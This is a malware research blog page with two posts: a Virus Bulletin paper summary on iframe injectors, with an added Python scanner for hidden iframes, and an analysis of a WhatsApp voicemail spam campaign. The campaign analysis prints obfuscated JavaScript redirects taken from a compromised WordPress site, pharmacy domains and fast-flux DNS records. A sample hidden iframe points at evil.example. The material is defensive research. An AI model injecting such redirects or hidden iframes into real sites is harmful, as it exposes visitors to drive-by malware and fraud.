Malware at Stake - An Official Malware Research Blog of SecNiche Security Labs. Analysis, straight from the hidden and underground. Author: Aditya K Sood (http://www.blogger.com/profile/10592122467317696329)
Posted 2017-05-14: [Virus Bulletin Conference] The TAO of Automated Iframe Injectors - Building Drive-by Platforms For Fun and Profit<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.virusbulletin.com/files/4614/4535/7515/logo-big.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="font-family: "georgia" , "times new roman" , serif;"><img border="0" height="86" src="https://www.virusbulletin.com/files/4614/4535/7515/logo-big.png" width="320" /></span></a></div>
<span style="font-family: "georgia" , "times new roman" , serif;"><span style="vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span id="docs-internal-guid-7fbca9fc-0815-8d8d-14ce-d4604447bd48"><span style="vertical-align: baseline; white-space: pre-wrap;">In this paper, we present the design of the distributed infection model that attackers use to inject malicious iframes on the fly and conduct large-scale drive-by download attacks. We use the term “Iframe Injectors” for the automated tools attackers use to trigger mass infections. Iframe Injectors can be either standalone tools or components embedded in botnets. We classify Iframe Injectors and dissect a number of existing tools to understand their functionality and how they are deployed effectively.</span></span></span><br />
<span style="font-family: "georgia" , "times new roman" , serif;"><span style="vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="vertical-align: baseline; white-space: pre-wrap;"><span style="background-color: white; color: #555555; white-space: normal;">Iframes are inline frames: HTML elements that embed a separate document (HTML or JavaScript) inside a web page, often fetched from a third-party domain. The framed content is rendered as part of the primary web page and is loaded whenever that page is accessed. This is standard HTML functionality and is heavily used for sharing content across domains. Attackers, however, abuse it in multiple variants of drive-by download attacks as part of massive iframe infection campaigns. An attack starts with a malicious domain that hosts malware (or the landing page of an exploit kit). The attackers embed a URL referencing that domain in an iframe, typically sized to zero or one pixel or positioned off-screen so the user never sees it, and inject it into a compromised website (or a website they control themselves). Users are then lured into visiting the page carrying the iframe. When the user's browser renders the page, it silently requests the framed content from the malicious domain and the end-user system is infected.</span></span>
<span style="vertical-align: baseline; white-space: pre-wrap;"><br /></span></span><br />
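The following is an added example, not code from the paper or from SecNiche: a small Python scanner that applies the heuristics an analyst uses to spot an injected iframe in a fetched page. It flags a frame whose src points off-site only when that is combined with a concealment or placement indicator: a zero/one-pixel size, hiding CSS, or placement after the closing &lt;/html&gt; tag, where a templating system never writes but a mass injector that appends to files does. The sample HTML and the hostnames in it (recipes.example, evil.example) are constructed for the demonstration.

```python
"""Flag iframes that look like drive-by injections in an HTML document.

Added example (not from the VB paper). Heuristics: off-site src combined
with a tiny size, hiding CSS, or placement after </html>. The sample page
at the bottom is constructed; an off-site frame alone is deliberately not
flagged, because legitimate embeds (video, ads) look exactly like that.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# CSS fragments that make a frame invisible to the user.
HIDDEN_CSS = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|"
    r"(?:left|top)\s*:\s*-\d{3,}px",  # positioned far off-screen
    re.I,
)


def _dim(value):
    """Parse a width/height attribute such as '1', '1px' or '100%' -> int or None."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


class IframeCollector(HTMLParser):
    """Collect every <iframe> and remember whether it came after </html>."""

    def __init__(self):
        super().__init__()
        self.frames = []
        self.seen_close_html = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append({"attrs": dict(attrs), "after_html": self.seen_close_html})

    def handle_endtag(self, tag):
        if tag == "html":
            # Markup after </html> was appended by something other than the
            # site's own templating, a classic mass-injection footprint.
            self.seen_close_html = True


def suspicious_iframes(html, page_host):
    """Return (src, reasons) for every iframe that trips the heuristics."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for frame in parser.frames:
        attrs = frame["attrs"]
        src = attrs.get("src", "")
        reasons = []
        host = urlparse(src).hostname
        if host and host != page_host and not host.endswith("." + page_host):
            reasons.append("external-src")
        width, height = _dim(attrs.get("width")), _dim(attrs.get("height"))
        if (width is not None and width <= 1) or (height is not None and height <= 1):
            reasons.append("tiny-size")
        if HIDDEN_CSS.search(attrs.get("style", "")):
            reasons.append("hidden-css")
        if frame["after_html"]:
            reasons.append("appended-after-</html>")
        # Require a concealment/placement indicator, not just an off-site src.
        if reasons and reasons != ["external-src"]:
            findings.append((src, reasons))
    return findings


# Constructed sample: one legitimate embed, one injected hidden frame.
SAMPLE = """<html><body>
<h1>Recipes</h1>
<iframe width="560" height="315" src="https://www.youtube.com/embed/abc"></iframe>
</body></html>
<iframe src="http://evil.example/gate.php" width="1" height="1"
        style="visibility:hidden;position:absolute;left:-9999px"></iframe>
"""

if __name__ == "__main__":
    for src, why in suspicious_iframes(SAMPLE, "recipes.example"):
        print(src, why)
```

Run it against a page fetched with the same User-Agent the victims use: injectors frequently serve the frame only to browsers and not to curl or known crawler agents, so a clean result from a generic client proves little.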
<span style="font-family: "georgia" , "times new roman" , serif; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-family: "georgia" , "times new roman" , serif; vertical-align: baseline; white-space: pre-wrap;">For complete details, the paper is available here: <a href="https://www.virusbulletin.com/virusbulletin/2016/10/tao-automated-iframe-injectors-building-driveby-platforms-fun-and-profit/" target="_blank">https://www.virusbulletin.com/virusbulletin/2016/10/tao-automated-iframe-injectors-building-driveby-platforms-fun-and-profit/</a></span><br />
<span style="font-family: "georgia" , "times new roman" , serif;"><br /></span>
<span style="font-family: "georgia" , "times new roman" , serif;">PDF is available here: <a href="https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Sood-Bansal.pdf" target="_blank">https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Sood-Bansal.pdf</a></span><br />
<span style="font-family: "georgia" , "times new roman" , serif; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-family: "georgia"; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>Aditya K Sood (http://www.blogger.com/profile/10592122467317696329)
Posted 2015-09-29 (updated 2015-10-08): [Updated] Nurturing JavaScript Obfuscation and Fast Flux DNS - "Whats App Voicemail Spamming" for Russian Online Pharmacies! <div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-l35xRxgiDxk/Vgr6B-IzS7I/AAAAAAAAB8E/7i_K7PV42BQ/s1600/whatsapp.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="155" src="http://1.bp.blogspot.com/-l35xRxgiDxk/Vgr6B-IzS7I/AAAAAAAAB8E/7i_K7PV42BQ/s200/whatsapp.jpg" width="200" /></a></div>
Recently, we analyzed a spam campaign in which fake "WhatsApp voicemail" notifications trick end users into visiting online pharmacy websites. There is a real chance that malware could be downloaded onto systems visiting such sites; however, during this analysis we did not observe that behaviour.<br />
<br />
The trend of fake "WhatsApp voicemail" spam messages is not new; we have been encountering these spam runs for the last few years. There have been no significant changes in how the fake voicemail notifications are sent to lure end users to illegitimate domains. From a security research perspective, however, the goal is to understand how the spam attack is carried out at the backend. <b>Because the WhatsApp brand is used as bait, there is a high chance that recipients will click the links in the notification emails.</b> This attack targets a broad set of Internet users in order to redirect them to online pharmacy outlets managed by Russian cyber actors. More on the online pharmacy monetary model here: <a href="https://en.wikipedia.org/wiki/Online_pharmacy" target="_blank">https://en.wikipedia.org/wiki/Online_pharmacy</a><br />
<br />
Let's perform the analysis. The end user receives the fake WhatsApp voicemail email notification shown below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-OR5HOw85YkE/Vgr4Qfme56I/AAAAAAAAB74/qFvNFHBYVsk/s1600/whats_app_spam.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="289" src="http://3.bp.blogspot.com/-OR5HOw85YkE/Vgr4Qfme56I/AAAAAAAAB74/qFvNFHBYVsk/s640/whats_app_spam.png" width="640" /></a></div>
<br />
<br />
When the end user clicks the link, the browser is sent to the domain below, which returns the HTTP exchange shown. The landing page lives under a WordPress theme directory (wp-content/themes/eStore/epanel/...), which suggests the hosting site is a compromised WordPress install rather than attacker-owned infrastructure. Let's take a close look at the HTTP request and response headers.<br />
<br />
<b><i><span style="color: purple;">GET /wp-content/themes/eStore/epanel/page_templates/js/educating.php HTTP/1.1</span></i></b><br />
<b><i><span style="color: purple;">Host: pasarjagakarsa.com</span></i></b><br />
<i>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0</i><br />
<i>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</i><br />
<i>Accept-Language: en-US,en;q=0.5</i><br />
<i>Accept-Encoding: gzip, deflate</i><br />
<i>Connection: keep-alive</i><br />
<i><br /></i>
<b><i><span style="color: purple;">(Status-Line) HTTP/1.1 404 Not Found</span></i></b><br />
<i>Server: nginx</i><br />
<i>Date: Tue, 29 Sep 2015 19:32:40 GMT</i><br />
<i>Content-Type: text/html</i><br />
<i>Transfer-Encoding: chunked</i><br />
<i>Connection: keep-alive</i><br />
<i>Vary: Accept-Encoding</i><br />
<i>X-Powered-By: PHP/5.4.44</i><br />
<i>Content-Encoding: gzip</i><br />
<br />
The highlighted status line reads "404 Not Found", which normally means the resource does not exist on the web server. That is not the case here: the body of this 404 response carries the content shown below. Serving the payload with an error status is a cheap evasion, since crawlers and some scanners discard or deprioritize error responses, while a browser renders the body regardless of the status code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-HLpe2YmN2eA/VgrzWaLuKnI/AAAAAAAAB7E/pTSPnVzRc78/s1600/Screen%2BShot%2B2015-09-29%2Bat%2B1.23.12%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="184" src="http://1.bp.blogspot.com/-HLpe2YmN2eA/VgrzWaLuKnI/AAAAAAAAB7E/pTSPnVzRc78/s640/Screen%2BShot%2B2015-09-29%2Bat%2B1.23.12%2BPM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Before going further, see our earlier articles on JavaScript de-obfuscation:</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li><a href="http://secniche.blogspot.com/2012/04/javascript-obfuscation-manual-armor-1.html" target="_blank">http://secniche.blogspot.com/2012/04/javascript-obfuscation-manual-armor-1.html</a></li>
<li><a href="http://secniche.blogspot.com/2012/04/javascript-obfuscation-manual-armor-2.html" target="_blank">http://secniche.blogspot.com/2012/04/javascript-obfuscation-manual-armor-2.html</a></li>
<li><a href="http://secniche.blogspot.com/2011/04/javascript-camouflaging-primer.html" target="_blank">http://secniche.blogspot.com/2011/04/javascript-camouflaging-primer.html </a></li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: left;">
The web page has obfuscated JavaScript embedded in it. Let's extract it:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-kwaIAUyc3-k/Vgrz51so5pI/AAAAAAAAB7M/-4XsESiVdyo/s1600/Screen%2BShot%2B2015-09-29%2Bat%2B1.25.45%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="268" src="http://4.bp.blogspot.com/-kwaIAUyc3-k/Vgrz51so5pI/AAAAAAAAB7M/-4XsESiVdyo/s640/Screen%2BShot%2B2015-09-29%2Bat%2B1.25.45%2BPM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The obfuscation is not complex and is easily reversed; the later samples in this post show the pattern, in which each character code is stored with a constant offset added and the script rebuilds the string with String.fromCharCode. On de-obfuscation it was observed that the user's browser was redirected to the following domain: "hxxp://magicorganicmarket.ru", as shown below:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-hfUm0zRXKpE/Vgr0n3Em7uI/AAAAAAAAB7U/_ZQEzN-1Gx0/s1600/Screen%2BShot%2B2015-09-29%2Bat%2B12.40.20%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="433" src="http://2.bp.blogspot.com/-hfUm0zRXKpE/Vgr0n3Em7uI/AAAAAAAAB7U/_ZQEzN-1Gx0/s640/Screen%2BShot%2B2015-09-29%2Bat%2B12.40.20%2BPM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Directory indexing was enabled on the compromised site, so requesting the directory holding the landing page "hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/educating.php" returned a directory listing, shown below:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-LOulaqIhFoo/Vgr1IhBsB6I/AAAAAAAAB7c/SyFiX7dsG-c/s1600/Screen%2BShot%2B2015-09-29%2Bat%2B12.35.22%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="328" src="http://3.bp.blogspot.com/-LOulaqIhFoo/Vgr1IhBsB6I/AAAAAAAAB7c/SyFiX7dsG-c/s640/Screen%2BShot%2B2015-09-29%2Bat%2B12.35.22%2BPM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-XtHutClTdgA/Vgr1Sc3ltFI/AAAAAAAAB7k/GHrdTy3svIw/s1600/Screen%2BShot%2B2015-09-29%2Bat%2B12.35.47%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="234" src="http://4.bp.blogspot.com/-XtHutClTdgA/Vgr1Sc3ltFI/AAAAAAAAB7k/GHrdTy3svIw/s640/Screen%2BShot%2B2015-09-29%2Bat%2B12.35.47%2BPM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The listing exposed several other PHP files carrying the same style of obfuscated JavaScript. Each is shown below together with the pharmacy domain its code redirects to. In every case the decoded string is a window.top.location.href assignment; because the decoding function is called inside setTimeout(), the rebuilt string is what setTimeout receives, and it is evaluated as code roughly 1.3 seconds after the page loads.</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div style="font-family: Menlo; font-size: 14px;">
<b>hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/chatterer.php</b></div>
<div style="font-family: Menlo; font-size: 14px;">
<br /></div>
<blockquote class="tr_bq">
<b><span style="color: purple;">function celle() { cella=72; cellb=[191,177,182,172,183,191,118,188,183,184,118,180,183,171,169,188,177,183,182,118,176,186,173,174,133,111,176,188,188,184,130,119,119,182,169,188,189,186,169,180,176,173,186,170,187,183,189,188,180,173,188,118,186,189,111,131]; cellc=""; for(celld=0;celld<cellb.length;celld++) { cellc+=String.fromCharCode(cellb[celld]-cella); } return cellc; } setTimeout(celle(),1306);</span></b></blockquote>
<div style="font-family: Menlo; font-size: 14px;">
<br /></div>
<div style="font-family: Menlo; font-size: 14px;">
<span style="font-family: Times; font-size: small;">Online Pharmacy Website after De-obfuscating JS Code</span>: <b>hxxp://naturalherbsoutlet.ru/</b></div>
<div style="font-family: Menlo; font-size: 14px;">
<br /></div>
<div style="font-family: Menlo; font-size: 14px;">
<br /></div>
<div style="font-family: Menlo; font-size: 14px;">
<b>hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/elimination.php</b></div>
<div style="font-family: Menlo; font-size: 14px;">
<br /></div>
<blockquote class="tr_bq">
<b><span style="color: purple;">function sicklee() { sicklea=42; sickleb=[161,147,152,142,153,161,88,158,153,154,88,150,153,141,139,158,147,153,152,88,146,156,143,144,103,81,146,158,158,154,100,89,89,145,143,152,143,156,147,141,139,147,142,141,153,151,154,139,152,163,88,156,159,81,101]; sicklec=""; for(sickled=0;sickled<sickleb.length;sickled++) { sicklec+=String.fromCharCode(sickleb[sickled]-sicklea); } return sicklec; } setTimeout(sicklee(),1276);</span></b></blockquote>
<div style="font-family: Menlo; font-size: 14px; min-height: 16px;">
<span style="font-family: Times; font-size: small;">Online Pharmacy Website after De-obfuscating JS Code</span>: <b>hxxp://genericaidcompany.ru/</b></div>
<div style="font-family: Menlo; font-size: 14px; min-height: 16px;">
<br /></div>
<div style="font-family: Menlo; font-size: 14px;">
<b>hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/fresnel.php</b></div>
<div style="font-family: Menlo; font-size: 14px;">
<br /></div>
<blockquote class="tr_bq">
<span style="color: purple;"><b>function timee() { timea=58; timeb=[177,163,168,158,169,177,104,174,169,170,104,166,169,157,155,174,163,169,168,104,162,172,159,160,119,97,162,174,174,170,116,105,105,167,159,158,163,157,155,166,173,155,160,159,173,159,172,176,163,157,159,173,104,172,175,97,117]; timec=""; for(timed=0;timed<timeb.length;timed++) { timec+=String.fromCharCode(timeb[timed]-timea); } return timec; } setTimeout(timee(),1292);</b></span></blockquote>
<div style="font-family: Menlo; font-size: 14px; min-height: 16px;">
<span style="font-family: Times; font-size: small;">Online Pharmacy Website after De-obfuscating JS Code</span>: <b>hxxp://medicalsafeservices.ru/</b></div>
<div style="font-family: Menlo; font-size: 14px; min-height: 16px;">
<b><br /></b></div>
<div style="font-family: Menlo; font-size: 14px;">
<b>hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/sensitive.php</b></div>
<div style="font-family: Menlo; font-size: 14px;">
<br /></div>
<blockquote class="tr_bq">
<span style="color: purple;"><b>function risee() { risea=80; riseb=[199,185,190,180,191,199,126,196,191,192,126,188,191,179,177,196,185,191,190,126,184,194,181,182,141,119,184,196,196,192,138,127,127,192,181,194,182,181,179,196,184,181,194,178,195,199,181,178,189,177,194,196,126,194,197,119,139]; risec=""; for(rised=0;rised<riseb.length;rised++) { risec+=String.fromCharCode(riseb[rised]-risea); } return risec; } setTimeout(risee(),1314);</b></span></blockquote>
Online Pharmacy Website after De-obfuscating JS Code<span style="font-family: Menlo; font-size: 14px;">: </span><b style="text-align: center;">hxxp://perfectherbswebmart.ru/</b><br />
<b style="text-align: center;"><br /></b>
<br />
<div style="font-family: Menlo; font-size: 14px;">
<b>hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/reclaimers.php</b></div>
<div style="font-family: Menlo; font-size: 14px;">
<br /></div>
<blockquote class="tr_bq">
<b><span style="color: purple;">function likede() { likeda=62; likedb=[181,167,172,162,173,181,108,178,173,174,108,170,173,161,159,178,167,173,172,108,166,176,163,164,123,101,166,178,178,174,120,109,109,173,172,170,167,172,163,176,163,171,163,162,183,180,159,170,179,163,108,176,179,101,121]; likedc=""; for(likedd=0;likedd<likedb.length;likedd++) { likedc+=String.fromCharCode(likedb[likedd]-likeda); } return likedc; } setTimeout(likede(),1296);</span></b></blockquote>
Online Pharmacy Website after De-obfuscating JS Code<span style="font-family: Menlo; font-size: 14px;">: </span><b>hxxp://onlineremedyvalue.ru/</b><br />
<b><br /></b>
<br />
<div style="font-family: Menlo; font-size: 14px;">
<b>hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/reclaimers.php</b></div>
<blockquote class="tr_bq">
<b><span style="color: purple;">function politye() { politya=38; polityb=[157,143,148,138,149,157,84,154,149,150,84,146,149,137,135,154,143,149,148,84,142,152,139,140,99,77,142,154,154,150,96,85,85,148,135,154,155,152,135,146,150,143,146,146,147,135,146,146,84,152,155,77,97]; polityc=""; for(polityd=0;polityd<polityb.length;polityd++) { polityc+=String.fromCharCode(polityb[polityd]-politya); } return polityc; } setTimeout(politye(),1272);</span></b></blockquote>
Online Pharmacy Website after De-obfuscating JS Code<span style="font-family: Menlo; font-size: 14px;">: </span><b>hxxp://naturalpillmall.ru/</b><br />
<b><br /></b>
<br />
<div style="font-family: Menlo; font-size: 14px;">
<b>hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/reclaimers.php</b></div>
<blockquote class="tr_bq">
<b><span style="color: purple;">function travellere() { travellera=56; travellerb=[175,161,166,156,167,175,102,172,167,168,102,164,167,155,153,172,161,167,166,102,160,170,157,158,117,95,160,172,172,168,114,103,103,160,157,170,154,153,164,160,167,172,168,173,170,155,160,153,171,157,102,170,173,95,115]; travellerc=""; for(travellerd=0;travellerd<travellerb.length;travellerd++) { travellerc+=String.fromCharCode(travellerb[travellerd]-travellera); } return travellerc; } setTimeout(travellere(),1290);</span></b></blockquote>
Online Pharmacy Website after De-obfuscating JS Code<span style="font-family: Menlo; font-size: 14px;">: </span><b>hxxp://herbalhotpurchase.ru/</b><br />
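The following is an added example, not code from the post: a Python decoder for the char-code arrays above. It assumes nothing beyond the pattern visible in the samples (a &lt;name&gt;a=&lt;key&gt; offset, a &lt;name&gt;b=[...] array, String.fromCharCode(code - key), and setTimeout(&lt;name&gt;e(), ms)), and it is checked against two of the samples copied verbatim from the post.

```python
"""Recover the redirect hidden in the obfuscated JavaScript served from the
compromised pasarjagakarsa.com pages.

Added example, not code from the original post. It relies only on the
pattern visible in the samples: <name>a=<key>; <name>b=[<codes>]; a loop
emitting String.fromCharCode(code - key); and setTimeout(<name>e(), ms).
Because <name>e() is *called* rather than passed, setTimeout receives the
rebuilt string and evaluates it as code after the delay.
"""
import re

# <name>a = <key>; <name>b = [ <codes> ]   (the <name> prefix differs per sample)
ARRAY_RE = re.compile(r"(\w+?)a\s*=\s*(\d+)\s*;\s*\1b\s*=\s*\[([\d,\s]+)\]")
DELAY_RE = re.compile(r"setTimeout\(\s*\w+\(\)\s*,\s*(\d+)\s*\)")
URL_RE = re.compile(r"https?://[^'\"\s;]+")


def decode(js):
    """Return the rebuilt script, the URL it redirects to and the delay in ms."""
    m = ARRAY_RE.search(js)
    if not m:
        raise ValueError("char-code array pattern not found")
    key = int(m.group(2))
    codes = [int(c) for c in m.group(3).split(",") if c.strip()]
    # A wrong key would produce negative or out-of-range code points.
    if any(not 0 <= c - key < 0x110000 for c in codes):
        raise ValueError("offset does not fit the code array")
    script = "".join(chr(c - key) for c in codes)
    url = URL_RE.search(script)
    delay = DELAY_RE.search(js)
    return {
        "script": script,
        "url": url.group(0) if url else None,
        "delay_ms": int(delay.group(1)) if delay else None,
    }


# Two samples copied verbatim from the post (chatterer.php, elimination.php).
CHATTERER = """function celle() { cella=72; cellb=[191,177,182,172,183,191,118,188,183,184,118,180,183,171,169,188,177,183,182,118,176,186,173,174,133,111,176,188,188,184,130,119,119,182,169,188,189,186,169,180,176,173,186,170,187,183,189,188,180,173,188,118,186,189,111,131]; cellc=""; for(celld=0;celld<cellb.length;celld++) { cellc+=String.fromCharCode(cellb[celld]-cella); } return cellc; } setTimeout(celle(),1306);"""

ELIMINATION = """function sicklee() { sicklea=42; sickleb=[161,147,152,142,153,161,88,158,153,154,88,150,153,141,139,158,147,153,152,88,146,156,143,144,103,81,146,158,158,154,100,89,89,145,143,152,143,156,147,141,139,147,142,141,153,151,154,139,152,163,88,156,159,81,101]; sicklec=""; for(sickled=0;sickled<sickleb.length;sickled++) { sicklec+=String.fromCharCode(sickleb[sickled]-sicklea); } return sicklec; } setTimeout(sicklee(),1276);"""

if __name__ == "__main__":
    for name, js in (("chatterer.php", CHATTERER), ("elimination.php", ELIMINATION)):
        result = decode(js)
        print(f"{name}: {result['script']}  (after {result['delay_ms']} ms)")
```

The key is not stored anywhere; the script subtracts the same constant from every element, so the regex picks up whatever prefix the generator chose and the offset next to it. If a future sample changes the arithmetic (XOR instead of subtraction, for instance), the range check raises rather than returning garbage.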
<b><br />[Updates]</b><br />
<br />
All of the storefronts above hand their orders to the same checkout backend, so the .ru domains are just interchangeable entry points: <b>hxxps://checkoutucxefvfq.fastcheckoutrx.com/</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-ePd2TsQ723s/Vg2SQmMhdkI/AAAAAAAAB8Y/2wNNfBT1hPU/s1600/Screen%2BShot%2B2015-10-01%2Bat%2B1.05.05%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="304" src="http://4.bp.blogspot.com/-ePd2TsQ723s/Vg2SQmMhdkI/AAAAAAAAB8Y/2wNNfBT1hPU/s640/Screen%2BShot%2B2015-10-01%2Bat%2B1.05.05%2BPM.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We also looked at how the name servers for these domains were configured and found DNS fluxing in use: the A records carry a Time-To-Live (TTL) of only 600 seconds, and once the TTL expires the domain resolves to a different set of IP addresses. Each answer already returns more than one address, so clients are spread across several hosts within a single TTL window as well.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Here is an example:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div style="line-height: 16px;">
<span style="font-family: inherit;"><b>perfectherbswebmart.ru. 600 IN A 82.199.121.167</b></span></div>
<div style="line-height: 16px;">
<span style="font-family: inherit;"><b>perfectherbswebmart.ru. 600 IN A 198.144.158.52</b></span></div>
<div style="line-height: 16px;">
<br /></div>
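The following is an added example, not code from the post: a Python scoring function over repeated DNS answers that separates fast flux from the short TTLs CDNs also use. Only the first answer is the one quoted above; the later answers and the benign baseline are constructed, so those addresses are assumptions.

```python
"""Score repeated DNS answers for fast-flux characteristics.

Added example, not code from the original post. `observations` is a list
of (seconds_since_first_lookup, ttl, [A records]) tuples such as one
collects by re-resolving a name every TTL. Only the first answer in PHARMA
is taken from the post; the later answers and the BENIGN baseline are
constructed for the demonstration.
"""
from ipaddress import ip_address


def flux_indicators(observations, ttl_threshold=900):
    """Return the list of fast-flux indicators the observations trip.

    A low TTL on its own is weak evidence (CDNs use short TTLs too), so the
    address churn and netblock spread indicators carry the weight.
    """
    ttls = [ttl for _, ttl, _ in observations]
    answers = [set(ips) for _, _, ips in observations]
    distinct = set().union(*answers)
    # /16 prefixes: a legitimate round-robin pool usually sits in one provider
    # block; fast-flux nodes are compromised hosts scattered across ISPs.
    prefixes = {int(ip_address(ip)) >> 16 for ip in distinct}  # IPv4 only
    # Answers that share no address at all with the previous answer.
    rotations = sum(1 for a, b in zip(answers, answers[1:]) if not a & b)

    found = []
    if max(ttls) <= ttl_threshold:
        found.append("low-ttl")
    if len(distinct) > 2 * max(len(a) for a in answers):
        found.append("address-churn")
    if len(prefixes) >= 3:
        found.append("netblock-spread")
    if rotations:
        found.append("full-rotations")
    return found


# First answer quoted in the post; the rest are constructed follow-ups.
PHARMA = [
    (0,    600, ["82.199.121.167", "198.144.158.52"]),
    (600,  600, ["198.144.158.52", "41.72.105.30"]),
    (1200, 600, ["41.72.105.30", "190.12.33.9"]),
    (1800, 600, ["37.140.192.8", "103.27.61.100"]),
]

# Constructed baseline: a short-TTL pool inside a single provider netblock.
BENIGN = [
    (0,   300, ["93.184.216.34", "93.184.216.35"]),
    (300, 300, ["93.184.216.35", "93.184.216.34"]),
]

if __name__ == "__main__":
    print("pharmacy domain:", flux_indicators(PHARMA))
    print("benign baseline:", flux_indicators(BENIGN))
```

To collect real observations, resolve the name once per TTL for a few hours (for example with dig +noall +answer) and feed the A records in; the baseline shows why a 300-second TTL alone should not trigger an alert.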
<div class="separator" style="clear: both; text-align: left;">
Some analytical points for consideration:</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li>The campaign relies heavily on ".ru" domains.</li>
<li>The uniformity of the injected code (the same loop in every file, with only the variable prefix, offset and delay changing) points to an automated generator used to scale the infection of compromised sites</li>
<ul>
<li>For example, planting PHP pages carrying the obfuscated JavaScript on compromised WordPress installs</li>
</ul>
<li>Judging by the artefacts, the campaign operates at considerable scale.</li>
<ul>
<li>Many similar instances of JavaScript obfuscation have been analyzed, as presented above</li>
<li>A number of online pharmacy websites were identified after de-obfuscating the JavaScript:</li>
<ul>
<li><b><span style="font-family: Times, Times New Roman, serif;">hxxp://herbalhotpurchase.ru/</span></b></li>
<li><b><span style="font-family: Times, Times New Roman, serif;">hxxp://naturalpillmall.ru/</span></b></li>
<li><b><span style="font-family: Times, Times New Roman, serif;">hxxp://onlineremedyvalue.ru/</span></b></li>
<li><b><span style="font-family: Times, Times New Roman, serif;">hxxp://perfectherbswebmart.ru/</span></b></li>
<li><b><span style="font-family: Times, Times New Roman, serif;">hxxp://medicalsafeservices.ru/</span></b></li>
<li><b><span style="font-family: Times, Times New Roman, serif;">hxxp://genericaidcompany.ru/</span></b></li>
<li><b><span style="font-family: Times, Times New Roman, serif;">hxxp://naturalherbsoutlet.ru/</span></b></li>
</ul>
</ul>
</ul>
<ul>
<li>We believe this is just the tip of the iceberg and that many more such instances exist</li>
</ul>
<div class="separator" style="clear: both; text-align: left;">
We would not be surprised to see the same tactics (compromised WordPress sites serving obfuscated redirects from 404 pages) used for drive-by downloads rather than pharmacy spam.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Note:</b> At the time of drafting this post, all the websites were active.</div>
<br />
Stay Secure ! Aditya K Sood (http://www.blogger.com/profile/10592122467317696329)
Posted 2015-05-11: "Armor for Android" - Rogue Marketing but Real Business - Who Cares for Ethics !<div class="separator" style="clear: both; text-align: center;">
